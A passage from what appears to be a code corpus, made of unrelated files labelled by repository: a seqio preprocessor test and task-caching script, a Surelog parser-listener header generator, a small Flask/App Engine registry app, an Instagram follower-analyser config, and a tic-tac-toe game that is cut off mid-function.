'bows': [12, 13],
})
# Don't trim to sequence lengths.
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset, output_features=output_features), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]],
'bows': [12, 13],
})
def test_append_to_innermost_axis(self):
test_cases = [
([1, 2, 3], -1, [1, 2, 3, -1]),
([[1, 2], [3, 4]], -1, [[1, 2, -1], [3, 4, -1]]),
(tf.ragged.constant([[1, 2], [3]]), -1, [[1, 2, -1], [3, -1]]),
(tf.ragged.constant([[[1, 2], [3]], [[4, 5, 6]]]), -1,
[[[1, 2, -1], [3, -1]], [[4, 5, 6, -1]]]),
(tf.ragged.constant([[[1, 2], [3, 4]], [[5, 6]]], ragged_rank=1), -1,
[[[1, 2, -1], [3, 4, -1]], [[5, 6, -1]]]),
]
for (tensor, scalar, expected) in test_cases:
with self.subTest(f'({tensor}, {scalar}) -> {expected}'):
actual = preprocessors._append_to_innermost_axis(tensor, scalar)
self.assertAllEqual(actual, expected)
def test_rekey(self):
og_dataset = tf.data.Dataset.from_tensors({
'text': 'That is good.', 'other': 'That is bad.'})
dataset = preprocessors.rekey(
og_dataset, {'inputs': 'other', 'targets': 'text'})
assert_dataset(
dataset,
{'inputs': 'That is bad.', 'targets': 'That is good.'})
dataset = preprocessors.rekey(og_dataset, {'targets': 'text'})
assert_dataset(dataset, {'targets': 'That is good.'})
dataset = preprocessors.rekey(og_dataset, {'inputs': 'text'})
assert_dataset(dataset, {'inputs': 'That is good.'})
dataset = preprocessors.rekey(og_dataset)
assert_dataset(dataset, {'text': 'That is good.', 'other': 'That is bad.'})
dataset = preprocessors.rekey(
og_dataset, {'inputs': 'text', 'targets': None})
assert_dataset(dataset, {'inputs': 'That is good.', 'targets': ''})
if __name__ == '__main__':
absltest.main()
```
#### File: seqio/scripts/cache_tasks_main.py
```python
r"""Dumps preprocessed tasks as TFRecord of tf.Examples.
Usage:
====================
seqio_cache_tasks \
--tasks=my_task_*,your_task \
--excluded_tasks=my_task_5 \
--output_cache_dir=/path/to/cache_dir \
--module_import=my.tasks \
--alsologtostderr
"""
import importlib
import os
import re
from absl import app
from absl import flags
from absl import logging
import apache_beam as beam
import seqio
from seqio import beam_utils
import tensorflow.compat.v2 as tf
# Significantly speeds up preprocessing in tf1.
tf.compat.v1.enable_eager_execution()
FLAGS = flags.FLAGS
flags.DEFINE_list(
"tasks", None,
"Regexes matching task(s) to build a preprocessed dataset for. Will build "
"all registered if not specified.")
flags.DEFINE_list(
"excluded_tasks", None,
"Regexes matching task(s) to skip.")
flags.DEFINE_string(
"output_cache_dir", None,
"The directory to output cached tasks to.")
flags.DEFINE_list(
"tasks_additional_cache_dirs", [],
"Additional directories to search for cached Tasks after checking the "
"global caches and `output_cache_dir`.")
flags.DEFINE_multi_string(
"module_import", [],
"Modules to import. Use this, for example, to add new `Task`s to the "
"global `TaskRegistry`.")
flags.DEFINE_list(
"pipeline_options", ["--runner=DirectRunner"],
"A comma-separated list of command line arguments to be used as options "
"for the Beam Pipeline.")
flags.DEFINE_boolean(
"overwrite", False,
"If true, overwrite the cached task even if it exists in the cached "
"directories.")
flags.DEFINE_integer(
"min_shards", 64,
"The minimum number of output shards to produce. Higher is better for "
"improved online data shuffling during training.")
def _import_modules(modules):
for module in modules:
if module:
importlib.import_module(module)
def run_pipeline(pipeline,
task_names,
cache_dir,
excluded_tasks=None,
modules_to_import=(),
overwrite=False,
completed_file_contents=""):
"""Run preprocess pipeline."""
output_dirs = []
# Includes all names by default.
included_regex = re.compile(r"(%s\Z)" % r"\Z|".join(task_names or [".*"]))
# Excludes only empty names by default.
excluded_regex = re.compile(r"(%s\Z)" % r"\Z|".join(excluded_tasks or []))
task_names = [
t for t in seqio.TaskRegistry.names()
if included_regex.match(t) and not excluded_regex.match(t)]
if not task_names:
logging.warning("No tasks have been selected from the task registry. "
"Please make sure that the tasks you want cached exist in "
"the task registry and haven't been excluded by the "
"--excluded_tasks flag.")
for task_name in task_names:
task = seqio.TaskRegistry.get(task_name)
if not task.supports_caching:
logging.info(
"Skipping task that does not support caching: '%s'", task.name)
continue
task_cache_dir = task.cache_dir
output_dir = os.path.join(
cache_dir, seqio.get_task_dir_from_name(task.name))
if task_cache_dir and not overwrite:
logging.info("Skipping task '%s', which exists in cache dir: %s",
task.name, task_cache_dir)
continue
if task_cache_dir and overwrite:
if task_cache_dir == output_dir:
# We were asked to overwrite the data, and the given directory that we
# should generate the data in already has the data, then delete it.
logging.warning(
"Overwriting already cached data for task '%s' in cache_dir %s",
task.name, output_dir)
tf.io.gfile.rmtree(output_dir)
else:
# Cannot overwrite, since cache_dir isn't same as task.cache_dir.
logging.warning("Not overwriting data in task.cache_dir since it is "
"different from cache_dir - %s vs %s", task.cache_dir,
output_dir)
continue
if not task.splits:
logging.warning("Skipping task '%s' with no splits.", task.name)
continue
# Log this task to the terminal.
print("Caching task '%s' with splits: %s" % (task.name, task.splits))
output_dirs.append(output_dir)
completion_values = []
if isinstance(task.source, seqio.FunctionDataSource):
logging.warning(
"Task '%s' using FunctionDataSource cannot be distributed. If your "
"dataset is large, you may be able to speed up preprocessing by "
"sharding it and using a TfdsSource, TFExampleSource, or "
"TextLineSource instead.", task.name)
for split in task.splits:
label = "%s_%s" % (task.name, split)
pat = beam_utils.PreprocessTask(
task, split, modules_to_import=modules_to_import)
num_shards = min(len(pat.shards), FLAGS.min_shards)
examples = pipeline | "%s_pat" % label >> pat
completion_values.append(
examples
| "%s_write_tfrecord" % label >> beam_utils.WriteExampleTfRecord(
seqio.get_cached_tfrecord_prefix(output_dir, split),
num_shards=num_shards))
completion_values.append(
examples
| "%s_info" % label >> beam_utils.GetInfo(num_shards)
| "%s_write_info" % label >> beam_utils.WriteJson(
seqio.get_cached_info_path(output_dir, split)))
completion_values.append(
examples
| "%s_stats" % label >> beam_utils.GetStats(task.output_features)
| "%s_write_stats" % label >> beam_utils.WriteJson(
seqio.get_cached_stats_path(output_dir, split)))
# After all splits for this task have completed, write COMPLETED files to
# the task's output directory.
_ = (completion_values
| "%s_flatten_completion_values" % task.name >> beam.Flatten()
| "%s_discard_completion_values" % task.name >> beam.Filter(
lambda _: False)
| "%s_write_completed_file" % task.name >> beam.io.textio.WriteToText(
os.path.join(output_dir, "COMPLETED"),
append_trailing_newlines=False, num_shards=1,
shard_name_template="", header=completed_file_contents))
return output_dirs
def main(_):
flags.mark_flags_as_required(["output_cache_dir"])
_import_modules(FLAGS.module_import)
seqio.add_global_cache_dirs(
[FLAGS.output_cache_dir] + FLAGS.tasks_additional_cache_dirs)
pipeline_options = beam.options.pipeline_options.PipelineOptions(
FLAGS.pipeline_options)
with beam.Pipeline(options=pipeline_options) as pipeline:
tf.io.gfile.makedirs(FLAGS.output_cache_dir)
unused_output_dirs = run_pipeline(
pipeline,
FLAGS.tasks,
FLAGS.output_cache_dir,
FLAGS.excluded_tasks,
FLAGS.module_import,
FLAGS.overwrite,
)
def console_entry_point():
app.run(main)
if __name__ == "__main__":
console_entry_point()
``` |
{
"source": "00mjk/Surelog",
"score": 2
} |
#### File: Surelog/scripts/generate_parser_listener.py
```python
import argparse
import os
import re
import sys
_this_filepath = os.path.realpath(__file__)
_default_workspace_dirpath = os.path.dirname(os.path.dirname(_this_filepath))
_type_names = set([
'slNoType',
'slComments',
'slModule',
# both Module_declaration and Interface_declaration enter and exit rules are in SV3_1aTreeShapeListener.cpp file
'slModule_declaration',
'slInterface_declaration',
# Class_type exit is in SV3_1aTreeShapeListener.cpp file
'slClass_type',
'slHierarchical_identifier',
'slModuleInstance',
'slPrimitive',
'slPrimitiveInstance',
'slInterface',
'slProgram',
'slPackage',
'slChecker',
'slClass',
'slPortInst',
'slConstSelect',
'slIntConst',
'slRealConst',
'slStringConst',
'slStringLiteral',
'slConstantSelect',
'slThis',
'slGenericElementType',
'sl0',
'sl1',
'slX',
'slZ',
'slNumber',
'slText_blob',
'slCR',
'slSpaces',
'slEscapedCR',
'slVirtual',
'slExtends',
'slImplements',
'slEndfunction',
'slEndmodule',
'slEndclass',
'slEndtask',
'slEndchecker',
'slEndinterface',
'slEndprogram',
'slEndpackage',
'slEndcase',
'slEndsequence',
'slEnd',
'slEndspecify',
'slEndconfig',
'slEndproperty',
'slEndgroup',
'slEndgenerate',
'slEndprimitive',
'slEndtable',
'slEndclocking',
'slUnique',
'slUnique0',
'slPriority',
'slCase',
'slCaseX',
'slCaseZ',
'slIncPartSelectOp',
'slDecPartSelectOp',
'slColumnPartSelectOp',
'slReturnStmt',
'slBreakStmt',
'slContinueStmt',
'slAssign',
'slDeassign',
'slForce',
'slRelease',
'slForever',
'slRepeat',
'slWhile',
'slFor',
'slDo',
'slForeach',
'slElse',
'slInterface_instantiation',
'slProgram_instantiation',
'slSupply0',
'slStrong0',
'slPull0',
'slWeak0',
'slSupply1',
'slStrong1',
'slPull1',
'slWeak1',
'slHighZ1',
'slHighZ0',
'slSmall',
'slMedium',
'slLarge',
'slDot',
'slDotStar',
'slNonBlockingTriggerEvent',
'slPound_Pound_delay',
'slPortDir_Inp',
'slPortDir_Out',
'slPortDir_Inout',
'slPortDir_Ref',
'slAlwaysKeywd_Always',
'slAlwaysKeywd_Comb',
'slAlwaysKeywd_Latch',
'slAlwaysKeywd_FF',
'slEdge_Posedge',
'slEdge_Negedge',
'slEdge_Edge',
'slNumber_Integral',
'slNumber_Real',
'slNumber_1Tickb0',
'slNumber_1Tickb1',
'slNumber_1TickB0',
'slNumber_1TickB1',
'slNumber_Tickb0',
'slNumber_Tickb1',
'slNumber_TickB0',
'slNumber_TickB1',
'slNumber_Tick0',
'slNumber_Tick1',
'slNumber_1Tickbx',
'slNumber_1TickbX',
'slNumber_1TickBx',
'slNumber_1TickBX',
'slSigning_Signed',
'slSigning_Unsigned',
'slTfPortDir_Inp',
'slTfPortDir_Out',
'slTfPortDir_Inout',
'slTfPortDir_Ref',
'slTfPortDir_ConstRef',
'slIntegerAtomType_Byte',
'slIntegerAtomType_Shortint',
'slIntegerAtomType_Int',
'slIntegerAtomType_LongInt',
'slIntegerAtomType_Int',
'slIntegerAtomType_Time',
'slIntVec_TypeBit',
'slIntVec_TypeLogic',
'slIntVec_TypeReg',
'slNonIntType_ShortReal',
'slNonIntType_Real',
'slNonIntType_RealTime',
'slUnary_Plus',
'slUnary_Minus',
'slUnary_Not',
'slUnary_Tilda',
'slUnary_BitwAnd',
'slUnary_BitwOr',
'slUnary_BitwXor',
'slUnary_ReductNand',
'slUnary_ReductNor',
'slUnary_ReductXnor1',
'slUnary_ReductXnor2',
'slBinOp_MultMult',
'slBinOp_Mult',
'slBinOp_Div',
'slBinOp_Percent',
'slBinOp_Plus',
'slBinOp_Minus',
'slBinOp_ShiftRight',
'slBinOp_ShiftLeft',
'slBinOp_ArithShiftRight',
'slBinOp_ArithShiftLeft',
'slBinOp_Less',
'slBinOp_LessEqual',
'slBinOp_Great',
'slBinOp_GreatEqual',
'slInsideOp',
'slBinOp_Equiv',
'slBinOp_Not',
'slBinOp_WildcardEqual',
'slBinOp_WildcardNotEqual',
'slBinOp_FourStateLogicEqual',
'slBinOp_FourStateLogicNotEqual',
'slBinOp_WildEqual',
'slBinOp_WildNotEqual',
'slBinOp_BitwAnd',
'slBinOp_ReductXnor1',
'slBinOp_ReductXnor2',
'slBinOp_ReductNand',
'slBinOp_ReductNor',
'slBinOp_BitwXor',
'slBinOp_BitwOr',
'slBinOp_LogicAnd',
'slBinOp_LogicOr',
'slBinOp_Imply',
'slBinOp_Equivalence',
'slIncDec_PlusPlus',
'slIncDec_MinusMinus',
'slTagged',
'slQmark',
'slMatches',
'slIff',
'slNull',
'slWith',
'slImport',
'slExport',
'slPure',
'slOpenParens',
'slCloseParens',
'slAssignOp_Assign',
'slAssignOp_Add',
'slAssignOp_Sub',
'slAssignOp_Mult',
'slAssignOp_Div',
'slAssignOp_Modulo',
'slAssignOp_BitwAnd',
'slAssignOp_BitwOr',
'slAssignOp_BitwXor',
'slAssignOp_BitwLeftShift',
'slAssignOp_BitwRightShift',
'slAssignOp_ArithShiftLeft',
'slAssignOp_ArithShiftRight',
'slIncDec_PlusPlus',
'slIncDec_MinusMinus',
'slNetType_Supply0',
'slNetType_Supply1',
'slNetType_Tri',
'slNetType_TriAnd',
'slNetType_TriOr',
'slNetType_TriReg',
'slNetType_Tri0',
'slNetType_Tri1',
'slNetType_Uwire',
'slNetType_Wire',
'slNetType_Wand',
'slNetType_Wor',
'slPulldown',
'slPullup',
'slWithin',
'slThroughout',
'slFirstMatch',
'slIntersect',
'slDefault',
'slGlobal',
# Properties
'slOR',
'slAND',
'slIF',
'slSTRONG',
'slWEAK',
'slNOT',
'slOVERLAP_IMPLY',
'slNON_OVERLAP_IMPLY',
'slOVERLAPPED',
'slNONOVERLAPPED',
'slS_NEXTTIME',
'slALWAYS',
'slS_ALWAYS',
'slS_EVENTUALLY',
'slEVENTUALLY',
'slUNTIL',
'slS_UNTIL',
'slUNTIL_WITH',
'slS_UNTIL_WITH',
'slIMPLIES',
'slIFF',
'slACCEPT_ON',
'slREJECT_ON',
'slSYNC_ACCEPT_ON',
'slSYNC_REJECT_ON',
'slType',
])
def _write_output(filename, content):
if os.path.exists(filename):
with open(filename, 'rt') as strm:
orig_content = strm.read()
if orig_content == content:
return False
dirpath = os.path.dirname(filename)
if not os.path.isdir(dirpath):
os.makedirs(dirpath)
with open(filename, 'wt') as strm:
strm.write(content)
strm.flush()
return True
def _get_implemented_methods(filepath):
parse_method_name_regex = re.compile('.+::(?P<method_name>(enter|exit|visit)\w+)\s*\(.*')
methods = set()
with open(filepath, 'rt') as strm:
for line in strm:
m = parse_method_name_regex.match(line)
if m:
methods.add(m.group('method_name'))
return methods
def _generate_header(listener, antlr_definition_filepath, cpp_input_filepath, output_header_filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'/*',
' Copyright 2019 <NAME>',
' Licensed under the Apache License, Version 2.0 (the \"License\");',
' you may not use this file except in compliance with the License.',
' You may obtain a copy of the License at',
'',
' http://www.apache.org/licenses/LICENSE-2.0',
'',
' Unless required by applicable law or agreed to in writing, software',
' distributed under the License is distributed on an \"AS IS\" BASIS,',
' WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.',
' See the License for the specific language governing permissions and',
' limitations under the License.',
' */',
'',
'/*',
f' * If a method needs custom operator, write the method in {os.path.basename(cpp_input_filepath)}',
' *',
f' * File: {os.path.basename(output_header_filepath)}',
' * Author: alain',
' *',
' * Created on April 16, 2017, 8:28 PM',
' */',
''
]
if listener == 'Parser':
content.extend([
'#ifndef SURELOG_SV3_1ATREESHAPELISTENER_H',
'#define SURELOG_SV3_1ATREESHAPELISTENER_H',
'#pragma once',
'',
'',
'#include <stack>',
'#include <map>',
'#include <unordered_map>',
'',
'#include "Surelog/Utils/ParseUtils.h"',
'#include "Surelog/SourceCompile/SymbolTable.h"',
'#include "Surelog/Design/TimeInfo.h"',
'#include "Surelog/Design/DesignElement.h"',
'#include "Surelog/Design/FileContent.h"',
'#include "Surelog/SourceCompile/ParseFile.h"',
'#include "Surelog/SourceCompile/CompilationUnit.h"',
'#include "Surelog/SourceCompile/CompileSourceFile.h"',
'#include "Surelog/SourceCompile/SV3_1aTreeShapeHelper.h"',
'#include "parser/SV3_1aParserBaseListener.h"',
'',
'namespace SURELOG {',
'',
' class SV3_1aTreeShapeListener : public SV3_1aParserBaseListener, public SV3_1aTreeShapeHelper {',
' private:',
'',
' public:',
' SV3_1aTreeShapeListener(ParseFile* pf, antlr4::CommonTokenStream* tokens, unsigned int lineOffset);',
' virtual ~SV3_1aTreeShapeListener() override;',
''
])
else:
content.extend([
'#ifndef SURELOG_SV3_1APPTREESHAPELISTENER_H',
'#define SURELOG_SV3_1APPTREESHAPELISTENER_H',
'#pragma once',
'',
'',
'#include <regex>',
'',
'#include "Surelog/SourceCompile/PreprocessFile.h"',
'#include "Surelog/SourceCompile/CompileSourceFile.h"',
'#include "Surelog/SourceCompile/Compiler.h"',
'#include "Surelog/SourceCompile/SymbolTable.h"',
'#include "Surelog/SourceCompile/CompilationUnit.h"',
'#include "Surelog/Design/TimeInfo.h"',
'#include "Surelog/SourceCompile/SV3_1aPpTreeListenerHelper.h"',
'#include "parser/SV3_1aPpParserBaseListener.h"',
'',
'namespace SURELOG {',
'',
' class SV3_1aPpTreeShapeListener : public SV3_1aPpParserBaseListener , public SV3_1aPpTreeListenerHelper {',
'',
' public:',
' SV3_1aPpTreeShapeListener(PreprocessFile* pp, antlr4::CommonTokenStream* tokens, PreprocessFile::SpecialInstructions& instructions);',
''
])
parse_method_name_regex = re.compile('\s*virtual\s+void\s+(?P<method_name>(enter|exit|visit)\w+)\s*\(.*')
sub_regex1 = re.compile('\s*virtual\s+(?P<declaration>void\s+(?P<method>(enter|exit|visit)\w+).+)\s+override\s+\{\s+\}')
sub_regex2 = re.compile('(.+)(/\*ctx\*/)(.+)')
implemented_methods = _get_implemented_methods(cpp_input_filepath)
with open(antlr_definition_filepath, 'rt') as strm:
for line in strm:
line = line.strip()
if line:
m = parse_method_name_regex.match(line)
if m:
method_name = m.group('method_name')
if 'ErrorNode' in method_name:
abc = 0
if method_name.startswith('exit'):
type_name = method_name.replace('enter', '').replace('exit', '').replace('visit', '')
_type_names.add(f'sl{type_name}')
if method_name in implemented_methods:
line = sub_regex1.sub(' \g<declaration> final;', line)
elif method_name.startswith('exit'):
method_name = method_name.replace('exit', '')
line = sub_regex1.sub(f'\g<declaration> final {{ addVObject(ctx, VObjectType::sl{method_name}); }}', line)
line = sub_regex2.sub(' \g<1>ctx\g<3>', line)
else:
line = sub_regex1.sub(' \g<declaration> final {}', line)
content.append(line)
content.extend([
' };',
'} // namespace SURELOG',
''
])
if listener == 'Parser':
content.append('#endif // SURELOG_SV3_1ATREESHAPELISTENER_H')
else:
content.append('#endif // SURELOG_SV3_1APPTREESHAPELISTENER_H')
_write_output(output_header_filepath, '\n'.join(content))
def _generate_VObjectTypes_h(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#ifndef SURELOG_VOBJECTTYPES_H',
'#define SURELOG_VOBJECTTYPES_H',
'#pragma once',
'',
'',
'enum VObjectType {',
]
index = 0
for type_name in sorted(_type_names, key=lambda s: s.lower()):
content.append(f' {type_name} = {index},')
index += 1
content.extend([
'};',
'',
'#endif // SURELOG_VOBJECTTYPES_H',
''
])
_write_output(filepath, '\n'.join(content))
def _generate_VObjectTypes_cpp(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#include <string>',
'#include "Surelog/Design/VObject.h"',
'',
'',
'using namespace SURELOG;',
'',
'std::string VObject::getTypeName(unsigned short type) {',
' switch (type) {',
]
content.extend([f' case {type_name}: return "{type_name}";' for type_name in sorted(_type_names, key=lambda s: s.lower())])
content.extend([
' default: return "";',
' }',
'}',
''
])
_write_output(filepath, '\n'.join(content))
def _generate_VObjectTypes_py_h(filepath):
content = [
'// This file is auto-generated by generate_parser_listener.py',
'// DO NOT EDIT',
'',
'#ifndef SURELOG_VOBJECTTYPES_PY_H',
'#define SURELOG_VOBJECTTYPES_PY_H',
'#pragma once',
'',
'',
'#include <vector>',
'#include <string_view>',
'',
'std::vector<std::string_view> slapi_types = {',
' "# This file is automatically generated by generate_parser_listener.py\\n",',
' "# DO NOT EDIT\\n",',
]
index = 0
for type_name in sorted(_type_names, key=lambda s: s.lower()):
content.append(f' "{type_name} = {index};\\n",')
index += 1
content.extend([
'};',
'',
'#endif // SURELOG_VOBJECTTYPES_PY_H',
''
])
_write_output(filepath, '\n'.join(content))
def _main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--workspace-dirpath', dest='workspace_dirpath', required=False, default=_default_workspace_dirpath, type=str,
help='Workspace root, either absolute or relative to current working directory.')
parser.add_argument(
'--output-dirpath', dest='output_dirpath', required=True, type=str,
help='Output directory path, either absolute or relative to the workspace directory.')
args = parser.parse_args()
if not os.path.isabs(args.workspace_dirpath):
args.workspace_dirpath = os.path.abspath(args.workspace_dirpath)
if not os.path.isabs(args.output_dirpath):
args.output_dirpath = os.path.join(args.workspace_dirpath, args.output_dirpath)
args.output_dirpath = os.path.abspath(args.output_dirpath)
_generate_header(
'Parser',
os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aParserBaseListener.h'),
os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aTreeShapeListener.cpp'),
os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aTreeShapeListener.h'))
_generate_header(
'PreProc',
os.path.join(args.output_dirpath, 'src', 'parser', 'SV3_1aPpParserBaseListener.h'),
os.path.join(args.workspace_dirpath, 'src', 'SourceCompile', 'SV3_1aPpTreeShapeListener.cpp'),
os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'SV3_1aPpTreeShapeListener.h'))
_generate_VObjectTypes_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'SourceCompile', 'VObjectTypes.h'))
_generate_VObjectTypes_cpp(os.path.join(args.output_dirpath, 'src', 'SourceCompile', 'VObjectTypes.cpp'))
_generate_VObjectTypes_py_h(os.path.join(args.output_dirpath, 'include', 'Surelog', 'API', 'VObjectTypes_py.h'))
return 0
if __name__ == '__main__':
sys.exit(_main())
``` |
{
"source": "00-MSME/a00_registry",
"score": 3
} |
#### File: a00_registry/src/main.py
```python
import logging
from google.appengine.api import users
from flask import Flask, redirect, flash
from constants import *
app = Flask(__name__)
app.secret_key = FLASK_SECRET_KEY
from shared import render_login_template, with_person
from models import Person
@app.route('/', methods=["GET"])
def home():
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
if person is not None:
return render_login_template("account.html", person=person)
else:
flash("choose a name and email to use with your augment00 account", "info")
return redirect("/person/new")
else:
return render_login_template("intro.html")
@app.route('/about', methods=["GET"])
def about():
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
else:
person = None
return render_login_template("about.html", person=person)
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request.')
return 'An internal error occurred.', 500
```
#### File: a00_registry/src/models.py
```python
import random
import uuid
from Crypto.PublicKey import RSA
from google.appengine.ext import ndb
from google.appengine.api import users
from base64 import b64encode, b64decode
from jinja2 import Template
from utilities import firebase, keys
from augment_exceptions import NonUniqueException
from constants import *
ALPHA_NUMERIC = "abcdefghijklmnopqrstuvwxyz0123456789"
def generateNewRandomAlphaNumeric(length):
random.seed()
values = []
for i in range(length):
values.append(random.choice(ALPHA_NUMERIC))
return "".join(values)
class Name(ndb.Model):
pass
class Email(ndb.Model):
pass
class GoogleId(ndb.Model):
pass
class Person(ndb.Model):
name_key = ndb.KeyProperty(kind="Name", required=True)
email_key = ndb.KeyProperty(kind="Email", required=True)
google_id_key = ndb.KeyProperty(kind="GoogleId")
api_key = ndb.StringProperty()
@classmethod
def create(cls, name, email, google_id):
name_key = cls._new_unique_key(Name, name)
email_key = cls._new_unique_key(Email, email)
google_id_key = cls._new_unique_key(GoogleId, google_id)
person_uuid = str(uuid.uuid4())
api_key = generateNewRandomAlphaNumeric(30)
person = cls(name_key=name_key,
email_key=email_key,
google_id_key=google_id_key,
id=person_uuid,
api_key=api_key)
person.put()
return person
def get_name(self):
return self.name_key.id()
def set_name(self, new_name):
self._set_unique_attribute(Name, "name_key", new_name)
def get_email(self):
return self.email_key.id()
def set_email(self, new_email):
self._set_unique_attribute(Email, "email_key", new_email)
def get_google_id(self):
return self.google_id_key.id()
@classmethod
def with_email(cls, email):
key = ndb.Key(Email, email)
return cls.query(cls.email_key == key).get()
@classmethod
def with_name(cls, name):
key = ndb.Key(Name, name)
return cls.query(cls.name_key == key).get()
@classmethod
def with_google_id(cls, google_id):
key = ndb.Key(GoogleId, google_id)
return cls.query(cls.google_id_key == key).get()
@staticmethod
def _new_unique_key(attribute_class, new_value):
new_attribute_key = ndb.Key(attribute_class, new_value)
existing_attribute_obj = new_attribute_key.get()
if existing_attribute_obj is not None:
raise NonUniqueException("The value %s for %s is adready in use" % (new_value, attribute_class))
else:
new_attribute_obj = attribute_class(key=new_attribute_key)
new_attribute_obj.put()
return new_attribute_key
@ndb.transactional(xg=True)
def _set_unique_attribute(self, attribute_class, attribute_key_name, new_value):
current_attribute_key = getattr(self, attribute_key_name)
current_value = current_attribute_key.id()
if current_value == new_value:
return
new_attribute_key = self._new_unique_key(attribute_class, new_value)
current_attribute_key.delete()
setattr(self, attribute_key_name, new_attribute_key)
self.put()
def add_new_entity(self, **kwargs):
return Entity.create(self.key, **kwargs)
@property
def entities(self):
return [e for e in Entity.query(Entity.person_key == self.key).iter()]
@property
def configs(self):
return [c for c in ConfigFile.query(ancestor=self.key).iter()]
def remove(self):
ndb.delete_multi(ConfigFile.query(ancestor=self.key).iter(keys_only=True))
ndb.delete_multi(Entity.query(Entity.person_key == self.key).iter(keys_only=True))
self.name_key.delete()
self.email_key.delete()
self.google_id_key.delete()
self.key.delete()
def reset_api_key(self):
self.api_key = generateNewRandomAlphaNumeric(30)
self.put()
def add_config_file(self, name, text, path):
config_uuid = str(uuid.uuid4())
config_file = ConfigFile(id=config_uuid,
parent=self.key,
name=name,
text=text,
path=path)
config_file.put()
return config_file
name = property(get_name, set_name)
email = property(get_email, set_email)
google_id = property(get_google_id)
class ConfigFile(ndb.Model):
name = ndb.StringProperty()
text = ndb.TextProperty()
path = ndb.StringProperty()
def as_json(self, entity):
entity_uuid = entity.key.id()
template_values = entity.template_values
template = Template(self.text)
return {
"text": template.render(uuid=entity_uuid, **template_values),
"path": self.path
}
class Entity(ndb.Model):
name = ndb.StringProperty()
description = ndb.TextProperty()
created = ndb.DateTimeProperty(auto_now_add=True)
person_key = ndb.KeyProperty(kind="Person", required=True)
public_key = ndb.TextProperty()
private_key = ndb.TextProperty()
serial = ndb.StringProperty()
config = ndb.KeyProperty(ConfigFile, repeated=True)
template_values = ndb.JsonProperty(default={})
schema = ndb.JsonProperty(default={})
def as_json(self):
entity_uuid = self.key.id()
return {
"name": self.name,
"description": self.description,
"created": str(self.created),
"person_key": self.person_key.id(),
"public_key": self.public_key,
"config": [c.get().as_json(self) for c in self.config]
}
@property
def config_files(self):
configs = [c.get() for c in self.config]
return configs
def add_config_file(self, config_file):
key = config_file.key
if not key in self.config:
self.config.append(key)
self.put()
def remove_config_file(self, config_file):
key = config_file.key
if key in self.config:
self.config.remove(key)
self.put()
def regenerate_keys(self):
public, private = keys.newkeys(2048)
self.private_key = private.exportKey('PEM')
self.public_key = public.exportKey('PEM')
self.put()
return self.private_key
@classmethod
def create(cls, person_key, **kwargs):
public, private = keys.newkeys(2048)
private_key = private.exportKey('PEM')
public_key = public.exportKey('PEM')
entity_uuid = str(uuid.uuid4())
entity = cls(id=entity_uuid,
person_key=person_key,
public_key=public_key,
private_key=private_key,
**kwargs)
entity.put()
return entity
```
#### File: a00_registry/src/shared.py
```python
from functools import wraps
from flask import Flask, render_template, redirect, request
from google.appengine.api import users
from models import Person
def render_login_template(template, **kwargs):
user = users.get_current_user()
if user:
login_url = users.create_logout_url(request.url)
url_linktext = 'logout'
else:
login_url = users.create_login_url(request.url)
url_linktext = 'login'
return render_template(template, login_url=login_url, url_linktext=url_linktext, **kwargs)
def with_person(func):
@wraps(func)
def decorated_view(*args, **kwargs):
google_user = users.get_current_user()
if google_user is not None:
google_id = google_user.user_id()
person = Person.with_google_id(google_id)
if person is None:
return redirect("/")
else:
return func(*args, person=person, **kwargs)
else:
raise Exception("no google user in new_person")
return decorated_view
``` |
{
"source": "00NoisyMime00/Instagram-Followers-Analyser",
"score": 3
} |
#### File: 00NoisyMime00/Instagram-Followers-Analyser/config.py
```python
from getpass import getpass
import json
import os.path
from os import path
if path.exists('user.json') == False:
with open('user.json', 'w') as f:
details = {}
details['id'] = ""
details['password'] = ""
json.dump(details, f)
with open('user.json', 'r') as f:
details = json.loads(f.read())
id = details['id']
password = details['password']
def change():
id = input('Enter you instagram handle : ')
password = <PASSWORD>()
details={}
details['id'] = id
details['password'] = password
with open('user.json', 'w') as f:
json.dump(details, f)
with open('followersList.json', 'w') as f:
json.dump([], f)
``` |
{
"source": "00NoisyMime00/Tick-Tac-Toe",
"score": 4
} |
#### File: 00NoisyMime00/Tick-Tac-Toe/Tic-Tac-Toe.py
```python
import os
winner = -1
c=0
s='1 2 3 4 5 6 7 8 9 '
def printboard(n):
'''
The function prints the board, and also the user who has the next turn.
The logic of adding a symbol includes searching the number in the string 's'
and placing it in place if the next character is a space.
'''
global s, winner
global c
if n != 0:
if c%2==0:
symb='0'
else:
symb='X'
i=s.find(n)
if s[i+1]==' ':
s=s[:i+1]+symb+s[i+2:]
else:
print()
print()
print('!!!!!Already taken!!!!!!')
c-=1
sv=' | | '
sh='-----------'
s3=' {} | {} | {} '.format(s[13],s[15],s[17])
s2=' {} | {} | {} '.format(s[7],s[9],s[11])
s1=' {} | {} | {} '.format(s[1],s[3],s[5])
print(sv)
print(s3)
print(sv)
print(sh)
print(sv)
print(s2)
print(sv)
print(sh)
print(sv)
print(s1)
print(sv)
if s[13] == s[15] == s[17] :
if s[13] == 'X':
winner = 2
elif s[13] == '0':
winner = 1
if s[7] == s[9] == s[11] :
if s[7] == 'X':
winner = 2
elif s[7] == '0':
winner = 1
if s[3] == s[5] == s[1] :
if s[1] == 'X':
winner = 2
elif s[1] == '0':
winner = 1
